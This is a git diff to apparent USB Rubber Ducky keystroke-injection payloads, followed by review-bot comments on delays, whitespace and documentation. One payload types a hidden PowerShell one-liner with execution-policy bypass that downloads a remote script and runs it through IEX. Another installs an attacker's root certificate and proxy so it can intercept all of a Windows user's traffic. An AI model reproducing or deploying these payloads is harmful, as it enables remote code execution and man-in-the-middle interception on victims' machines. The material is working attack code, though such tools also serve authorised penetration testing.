diff --git a/payloads/extensions/community/RUN_HOSTED_POWERSHELL b/payloads/extensions/community/RUN_HOSTED_POWERSHELL index 05863ad..5c15895 100644 --- a/payloads/extensions/community/RUN_HOSTED_POWERSHELL +++ b/payloads/extensions/community/RUN_HOSTED_POWERSHELL @@ -16,6 +16,7 @@ EXTENSION RUN_HOSTED_POWERSHELL DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE GUI r + DELAY #RHP_DELAY STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX" @@ -26,7 +27,7 @@ EXTENSION RUN_HOSTED_POWERSHELL END_IF_DEFINED ENTER - + IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION ATTACKMODE OFF END_IF_DEFINED diff --git a/payloads/library/execution/Windows-Duck-In-The-Middle/README.md b/payloads/library/execution/Windows-Duck-In-The-Middle/README.md index 20750e3..05ea995 100644 --- a/payloads/library/execution/Windows-Duck-In-The-Middle/README.md +++ b/payloads/library/execution/Windows-Duck-In-The-Middle/README.md @@ -2,17 +2,19 @@

- View on: Payload Studio + VIEW ON: HAK5 PAYLOADSTUDIO - Target: Windows 10, 11 + TARGET: WINDOWS 10, 11 + + + VERSION: 1.0

This payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). After executing your payload, the proxy server will intercept all the target user's network traffic. -
-Payload operation +## Process 1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows. 2. Creates a new virtual desktop. @@ -26,16 +28,15 @@ This payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-mi 6. Closes the virtual desktop. 7. *Disables USB Rubber Ducky* -> Note: No configuration is required for Chromium-based browsers since they accept user root certificates by default. - -
+> [!NOTE] +> No configuration is required for Chromium-based browsers since they accept user root certificates by default. ## Prerequisites -To use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). -The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org) or [Burp Suite](https://portswigger.net/burp). +To use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com/). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org/) or [Burp Suite](https://portswigger.net/burp). -> Note: To ensure the payload functions properly, generate the "mitmproxy-ca-cert.pem" certificate in the "Other platforms" section when using mitmproxy. +> [!WARNING] +> To ensure the payload functions properly, generate the "mitmproxy-ca-cert.pem" certificate in the "Other platforms" section when using mitmproxy. ## Options @@ -55,4 +56,4 @@ The certificate must be downloadable from a website, either from your proxy serv ## Contributors -- [@PlumpyTurkey](https://github.com/PlumpyTurkey) +- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey) diff --git a/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt b/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt index f14402b..2e7cfec 100644 --- a/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt +++ b/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt 
@@ -85,8 +85,10 @@ END_EXTENSION CTRL GUI d GUI x + DELAY #SHORT_DELAY STRING i + DELAY #MEDIUM_DELAY STRING_POWERSHELL Clear-Host; @@ -117,12 +119,16 @@ STRING_POWERSHELL exit } END_STRING + ENTER + DELAY #LONG_DELAY ALT TAB + DELAY #SHORT_DELAY TAB ENTER + CTRL GUI F4 IF_DEFINED_TRUE #DISABLE_AFTER_EXECUTION
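Review bot: in the RUN_HOSTED_POWERSHELL hunk (`@@ -16,6 +16,7 @@`), the added `DELAY #RHP_DELAY` references a define that is not visible anywhere in this diff; the extension's visible DEFINE block only shows `#RHP_DISABLE_AFTER_EXECUTION FALSE`. Confirm that `#RHP_DELAY` is declared with a default elsewhere in the file so the extension still works for users who do not set it, and document it next to `#RHP_SCRIPT_URL` and `#RHP_DISABLE_AFTER_EXECUTION` in the extension header.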
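Review bot: the second RUN_HOSTED_POWERSHELL hunk (`@@ -26,7 +27,7 @@`) appears to be a whitespace-only change, a blank line after `ENTER` removed and re-added (presumably trailing whitespace or a line-ending difference). It carries no functional change; either drop it or squash it into the previous hunk so the diff stays focused on the `#RHP_DELAY` addition.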
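Review bot: the README hunk (`@@ -2,17 +2,19 @@`) switches the two notes from the plain `> Note:` form to GitHub-style alert blocks (`> [!NOTE]`, `> [!WARNING]`). Since the same commit moves the contributor link from github.com to codeberg.org, verify that the renderer the repository is viewed on supports this alert syntax; where it does not, the `[!NOTE]` marker is shown literally as text, and the plain `> Note:` form would be the safer choice. The new `VERSION: 1.0` line in the header is also worth pairing with a brief changelog entry, as the version has no history to point to otherwise.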
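Review bot: in the first payload.txt hunk (`@@ -85,8 +85,10 @@`), the new `DELAY #SHORT_DELAY` and `DELAY #MEDIUM_DELAY` lines (and `DELAY #LONG_DELAY` in the following hunk) reference named delay constants whose DEFINE lines are not part of this diff. If these constants are new in this commit, their DEFINE lines should be included in the change; if they are existing options, they belong in the README's `## Options` section, which this commit touches but does not extend.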
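Review bot: in the second payload.txt hunk (`@@ -117,12 +119,16 @@`), none of the four added lines (`ENTER`, `DELAY #LONG_DELAY`, `DELAY #SHORT_DELAY`, `CTRL GUI F4`) carries a `REM` comment, and `CTRL GUI F4` runs unconditionally right before the `IF_DEFINED_TRUE #DISABLE_AFTER_EXECUTION` block. A one-line `REM` stating which README step each keystroke corresponds to (the README lists "6. Closes the virtual desktop" and "7. Disables USB Rubber Ducky") would make the `ENTER` / `ALT TAB` / `TAB ENTER` / `CTRL GUI F4` sequence reviewable without cross-referencing the README.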